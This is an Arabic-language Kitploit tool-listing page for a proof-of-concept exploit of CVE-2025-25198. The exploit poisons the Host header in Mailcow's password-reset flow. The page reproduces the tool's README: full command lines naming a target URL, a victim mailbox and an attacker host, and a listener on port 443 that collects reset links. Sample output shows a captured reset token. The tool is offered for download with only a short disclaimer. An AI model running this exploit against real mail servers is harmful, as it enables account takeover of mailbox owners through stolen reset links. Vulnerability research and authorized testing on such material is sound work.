Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-25198-PoC — PoC لـ CVE-2025-25198: اختبار آلي لتسميم ترويسة المضيف (Host header) لـ Mailcow - مستمع HTTPS، معالجة تلقائية للكوكيز/CSRF، يلتقط رابط إعادة التعيين الأول. | Kitploit
أدوات/GitHubGitHub/groppoxx/cve-2025-25198-poc
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubgroppoxx/cve-2025-25198-poc

CVE-2025-25198-PoC

PoC لـ CVE-2025-25198: اختبار آلي لتسميم ترويسة المضيف (Host header) لـ Mailcow - مستمع HTTPS، معالجة تلقائية للكوكيز/CSRF، يلتقط رابط إعادة التعيين الأول.

عرض المستودع
2012منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2025-25198-PoC

إثبات مفهوم لـ CVE-2025-25198، وهي مشكلة تسميم ترويسة Host تؤثر على تدفقات إعادة تعيين كلمة المرور في Mailcow.

يبدأ السكربت مستمع HTTPS محليًا على المنفذ 443، ويحصل على رمز CSRF صالح تلقائيًا، ويرسل تسلسل إعادة تعيين كلمة المرور مع ترويسة Host مسمومة، ويتوقف عند استرداد رابط إعادة تعيين إما من استجابة HTTP أو من استدعاء إلى المستمع.

ماذا يفعل

  1. يبدأ مستمع HTTPS بشهادة موقّعة ذاتيًا.
  2. ينشئ جلسة عميل HTTP جديدة.
  3. يحصل على رمز CSRF تلقائيًا.
  4. يرسل تدفق إعادة التعيين مع ترويسة Host مُتحكَّم بها.
  5. يستخرج روابط إعادة التعيين من الاستجابات وعمليات إعادة التوجيه.
  6. ينتظر وصول طلب إلى المستمع إذا أرسل الهدف الرابط خارج النطاق.
  7. يتوقف عند أول رابط إعادة تعيين صالح ويطبعه بشكل نظيف.

المتطلبات

root@kitploit:~
Python 3.8+
OpenSSL in PATH
sudo/root privileges to bind port 443
Inbound TCP/443 reachable from the target

تثبيت التبعيات:

root@kitploit:~
pip install -r requirements.txt

بدء سريع

القيم المحاطة بأقواس زاوية هي عناصر نائبة. استبدلها بقيمك الخاصة ولا تُدرج الحرفين < أو >.

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url <MAILCOW_URL> \
  --username <MAILBOX> \
  --attacker-host <ATTACKER_HOST> \
  --http2

العناصر النائبة

root@kitploit:~
<MAILCOW_URL>    # Target Mailcow base URL. Example: https://mail.example.com
<MAILBOX>        # Mailbox/user passed to the reset form. Usually an email address.
<ATTACKER_HOST>  # IP or DNS name that the target can reach on TCP/443.

مثال كامل

root@kitploit:~
sudo python3 cve_2025_25198.py \
  --listen-host 0.0.0.0 \
  --base-url https://mail.cows.com \
  --username [email protected] \
  --attacker-host 10.10.13.12 \
  --http2

مثال على المخرجات:

root@kitploit:~
[2026-05-17T18:30:12Z] [+] HTTPS listener on https://0.0.0.0:443
[2026-05-17T18:30:13Z] [+] Auto CSRF: 0123456789abcdef...
[2026-05-17T18:30:13Z] [>] Sending sequence with poisoned Host
[2026-05-17T18:30:14Z] [HIT] GET /reset-password?token=AAAA-BBBB-CCCC-DDDD ← 10.10.13.12 [200]

╔════════════════════════════════════════════════════════════════════════════════╗
║  RESET LINK FOUND!  (listener)                                                 ║
╟════════════════════════════════════════════════════════════════════════════════╢
║  https://mail.cows.com/reset-password?token=AAAA-BBBB-CCCC-DDDD                ║
║  Target: mail.cows.com                                                         ║
╚════════════════════════════════════════════════════════════════════════════════╝

عرض توضيحي

asciicast

خيارات إضافية

root@kitploit:~
--http2
   Use HTTP/2 via httpx. Recommended for best parity with modern browsers.

--interval <seconds>
   Seconds between attempts and listener wait windows. Default: 8

--max-attempts <N>
   Stop after N attempts. Default: 0, which means retry indefinitely.

--cookie '<pairs>'
   Seed the client cookie jar manually.
   Example: --cookie 'PHPSESSID=abcdef123456; another=value'

--csrf <TOKEN>
   Use a known CSRF token instead of auto-discovery.

--only-final
   Hide progress logs and print only the final reset-link banner.

ملاحظات

  • المستمع يرتبط دائمًا بالمنفذ 443.
  • على Linux/macOS، يتطلب ربط المنفذ 443 صلاحيات sudo أو الجذر.
  • يجب أن يتمكن الهدف من الوصول إلى https://<ATTACKER_HOST>/.
  • إذا تم العثور على رابط إعادة تعيين في استجابة HTTP، يخرج السكربت فورًا.
  • إذا لم يتم العثور على رابط في الاستجابة، ينتظر السكربت استدعاءً إلى مستمع HTTPS.
  • إذا لم يتم استرداد أي رابط، يعيد التسلسل المحاولة كل 8 ثوانٍ افتراضيًا.
  • يتم إنشاء server.pem و server.key تلقائيًا إذا كانا مفقودين.

إخلاء المسؤولية القانونية

يهدف إثبات المفهوم هذا إلى اختبار الأمان المصرح به، والبيئات المخبرية، والتحقق من الثغرات. لا تستخدمه ضد أنظمة دون إذن صريح.

تنزيل الأداة